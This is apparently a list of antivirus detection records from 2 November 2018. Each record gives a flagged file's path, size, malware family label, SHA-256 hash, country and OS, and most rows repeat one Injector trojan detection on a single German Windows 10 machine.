  Row(detection=Row(filename='avscan-20181102-061416-7f15efd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061416-7F15EFD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001ff4', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001ff4', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085901-9a36695b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc852a30\\AVSCAN-20181102-085724-896525AA\\AVSCAN-20181102-085901-9A36695B', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T185056-00015/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T08:37:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-020220-5fe2141d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45a5adc8\\AVSCAN-20181102-020159-5CA589F4\\AVSCAN-20181102-020220-5FE2141D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:02:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054700-b047a469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054700-B047A469', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093008-19c82a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73a442e8\\AVSCAN-20181102-092952-178EDE82\\AVSCAN-20181102-093008-19C82A3B', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='4e0cfcd6a5358c4465ddc79d70cd314859633ad974fbeac04f8c4cbcaf7b39ee', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104538-86ac6784', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60109a57\\AVSCAN-20181102-104519-841AB320\\AVSCAN-20181102-104538-86AC6784', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132907-5a2012f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132907-5A2012F5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051536-4d6bd817', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051536-4D6BD817', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qwohoamk.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\qWOHoAMk.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153927-070f8cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153927-070F8CF7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dini.bat', filepath='\\\\Umum\\keuangan\\DINI\\DINI.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T06:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resourcetree.exe', filepath='I:\\Games\\Titan Quest Anniversary Edition Ragnarok\\ResourceTree.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='6f86dfaa4813591fa53893b0f0995b8a9c9e7aede0ee3531f9781f001ed09ba0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061047-3a0c358a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b05b3c72\\AVSCAN-20181102-060736-2087495F\\AVSCAN-20181102-061047-3A0C358A', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130436-98c161cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a192cd9\\AVSCAN-20181102-130243-87ABE5F2\\AVSCAN-20181102-130436-98C161CC', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050702-1aa218d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050702-1AA218D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151359-eb4a3ca6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151359-EB4A3CA6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052631-d3d86013', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052631-D3D86013', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052414-81bb5ad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052414-81BB5AD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051457-35a5e332', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051457-35A5E332', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055522-db538653', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055522-DB538653', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052851-26caf7ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052851-26CAF7CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054249-1a8b8e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054249-1A8B8E3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054300-20d8458c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054300-20D8458C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052410-7fba24c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052410-7FBA24C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e986cc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E986CC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062653-4228909f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062653-4228909F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13ecdcc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13ECDCC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052648-dd895926', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052648-DD895926', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5c28034', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5C28034', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050927-710813c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050927-710813C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052013-f2703b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052013-F2703B4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0ab095d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0AB095D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051641-73df4896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051641-73DF4896', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055344-a12483b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055344-A12483B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051606-5f006a38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051606-5F006A38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061126-1a2ab58d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061126-1A2AB58D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052023-f8635fcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052023-F8635FCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-22160133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-22160133', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052423-87279d89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052423-87279D89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062048-68ac7814', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062048-68AC7814', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051248-e94ac078', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051248-E94AC078', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053800-6e51d398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053800-6E51D398', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054844-edd9013c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054844-EDD9013C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061532-ac85d62d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061532-AC85D62D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051707-8325cb21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051707-8325CB21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062329-c8eefa34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062329-C8EEFA34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055910-6360d781', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055910-6360D781', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062241-abf8c3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062241-ABF8C3FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054123-e738056a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054123-E738056A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051118-b31c0b24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051118-B31C0B24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:16Z'), dt=datetime.date(2018, 11, 2)),
